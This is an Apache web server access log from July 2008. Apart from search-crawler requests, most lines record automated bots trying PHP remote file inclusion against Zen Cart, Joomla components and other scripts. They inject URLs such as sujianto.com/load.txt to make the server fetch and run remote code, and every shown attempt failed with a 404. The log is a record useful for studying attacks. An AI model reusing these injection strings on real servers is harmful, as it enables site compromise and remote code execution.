193.138.159.164 - - [10/Jul/2008:23:25:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:25:01 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sujianto.com/load.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.8.88 - - [10/Jul/2008:23:25:17 -0500] "GET /logs/access_log.1211328000 HTTP/1.0" 200 386953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.239.161.224 - - [10/Jul/2008:23:28:17 -0500] "GET /logs/access_log.1194048000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
211.239.161.224 - - [10/Jul/2008:23:28:18 -0500] "GET //plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
211.239.161.224 - - [10/Jul/2008:23:28:18 -0500] "GET /logs//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.6.8.88 - - [10/Jul/2008:23:28:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.138.159.164 - - [10/Jul/2008:23:29:20 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:29:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:29:22 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
193.138.159.164 - - [10/Jul/2008:23:29:22 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.6.8.88 - - [10/Jul/2008:23:33:02 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2177 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.151.202.2 - - [10/Jul/2008:23:34:14 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:34:15 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:34:20 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
194.151.202.2 - - [10/Jul/2008:23:34:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://sujianto.com/load.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
75.102.21.29 - - [10/Jul/2008:23:37:35 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
75.102.21.29 - - [10/Jul/2008:23:37:35 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.6.8.88 - - [10/Jul/2008:23:38:00 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.88 - - [10/Jul/2008:23:38:00 -0500] "GET /?D=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.51.212.82 - - [10/Jul/2008:23:46:36 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
209.51.212.82 - - [10/Jul/2008:23:46:36 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
192.80.24.35 - - [10/Jul/2008:23:46:39 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://sujianto.com/sr.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
192.80.24.35 - - [10/Jul/2008:23:46:39 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://sujianto.com/sr.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
74.6.8.88 - - [10/Jul/2008:23:52:54 -0500] "GET /logs/access_log.1200355200 HTTP/1.0" 200 161147 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.158.128.74 - - [10/Jul/2008:23:52:58 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.158.128.74 - - [10/Jul/2008:23:52:58 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.20.138.101 - - [10/Jul/2008:23:55:26 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dev.maven.com.tw/images/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.20.138.101 - - [10/Jul/2008:23:55:27 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dev.maven.com.tw/images/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
217.20.138.101 - - [10/Jul/2008:23:56:56 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
217.20.138.101 - - [10/Jul/2008:23:56:56 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://merino.co.th/components/com_joomlaboard/template/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
85.234.133.173 - - [10/Jul/2008:23:57:14 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
85.234.133.173 - - [10/Jul/2008:23:57:14 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
194.114.145.73 - - [10/Jul/2008:23:57:27 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR